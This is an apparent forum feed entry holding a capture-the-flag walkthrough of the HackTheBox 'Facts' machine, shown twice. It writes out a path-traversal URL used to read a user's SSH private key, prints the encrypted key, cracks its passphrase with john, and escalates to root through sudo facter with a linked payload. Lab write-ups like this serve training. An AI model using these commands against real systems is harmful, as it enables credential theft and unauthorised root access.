ssh2john id_ed25519 &gt; hash.txt<br />
john --wordlist=rockyou.txt hash.txt<br />
password: dragonballz<br />
<br />
ssh login as trivia:<br />
ssh -i id_ed25519 trivia@facts.htb (password: dragonballz)<br />
<br />
privesc<br />
-------<br />
sudo -l shows /usr/bin/facter - exploited it to create SUID on bash<br />
<br />
mkdir -p /tmp/.exploit/facter<br />
<br />
in /tmp/.exploit/facter/root.rb add this code: (sorry breachforum blocks me when i wanna write the code directly on the writeup, so heres a pastebin)<br />
<br />
<a href="https://pastebin.com/Pd4vBWHZ" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/Pd4vBWHZ</a><br />
<br />
sudo /usr/bin/facter --custom-dir /tmp/.exploit/facter<br />
/bin/bash -p<br />
<br />
got root <img src="https://breachforums.rs/images/smilies/smile.png" alt="Smile" title="Smile" class="smilie smilie_1" />]]></description>
			<content:encoded><![CDATA[FACTS - HACKTHEBOX<br />
LINUX - EASY<br />
IP: 10.129.69.95 (ull have a different ip)<br />
<br />
users<br />
-----<br />
william<br />
trivia<br />
<br />
recon<br />
-----<br />
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.129.69.95 (ctf only)<br />
<br />
22/OpenSSH 9.9p1<br />
80/nginx 1.26.3<br />
    - path traversal on CameleonCMS 2.9.0 CVE-2024-46987 (base vuln version 2.8.0 but works on 2.9.0)<br />
54321/http <br />
<br />
exploit<br />
------------<br />
<br />
grabbed /home/trivia/.ssh/id_ed25519 via path traversal:<br />
<a href="http://facts.htb/admin/media/download_private_file?file=,,/,,/,,/,,/,,/,,/home/trivia/.ssh/id_ed25519" target="_blank" rel="noopener" class="mycode_url">http://facts.htb/admin/media/download_pr...id_ed25519</a> (remplate , by . for the path, BF block me)<br />
<br />
-----BEGIN OPENSSH PRIVATE KEY-----<br />
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCd4lFW9D<br />
oZ28sQDBe+ZIltAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAILNlyBF4wULHGQax<br />
bUqV/3L712nR8jkzuG2DHrCPy9r/AAAAoILU2uUq5EuFWxb49m7/O1r+jOXkqJFPDFW3Sx<br />
64HaSutBpMBTpNIWf6RviD/iEjRXHM7dKr6LBzu6PiZ3iA82tlbhAKqfZ9WvWYINhYxiQL<br />
G3jKAVqOn5q6D7s5NSxOe6mOW1d5fshHZXKBqqU3WOt9Wvh9/yCZovIhIRK7/GcXCZdTVY<br />
1Mce3bg0ERwrOixPG5d0SvnvdSLvIzcvaI/+w=<br />
-----END OPENSSH PRIVATE KEY-----<br />
<br />
bruteforced the passphrase:<br />
ssh2john id_ed25519 &gt; hash.txt<br />
john --wordlist=rockyou.txt hash.txt<br />
password: dragonballz<br />
<br />
ssh login as trivia:<br />
ssh -i id_ed25519 trivia@facts.htb (password: dragonballz)<br />
<br />
privesc<br />
-------<br />
sudo -l shows /usr/bin/facter - exploited it to create SUID on bash<br />
<br />
mkdir -p /tmp/.exploit/facter<br />
<br />
in /tmp/.exploit/facter/root.rb add this code: (sorry breachforum blocks me when i wanna write the code directly on the writeup, so heres a pastebin)<br />
<br />
<a href="https://pastebin.com/Pd4vBWHZ" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/Pd4vBWHZ</a><br />
<br />
sudo /usr/bin/facter --custom-dir /tmp/.exploit/facter<br />
/bin/bash -p<br />
<br />
got root <img src="https://breachforums.rs/images/smilies/smile.png" alt="Smile" title="Smile" class="smilie smilie_1" />]]></content:encoded>
		</item>
	</channel>
</rss>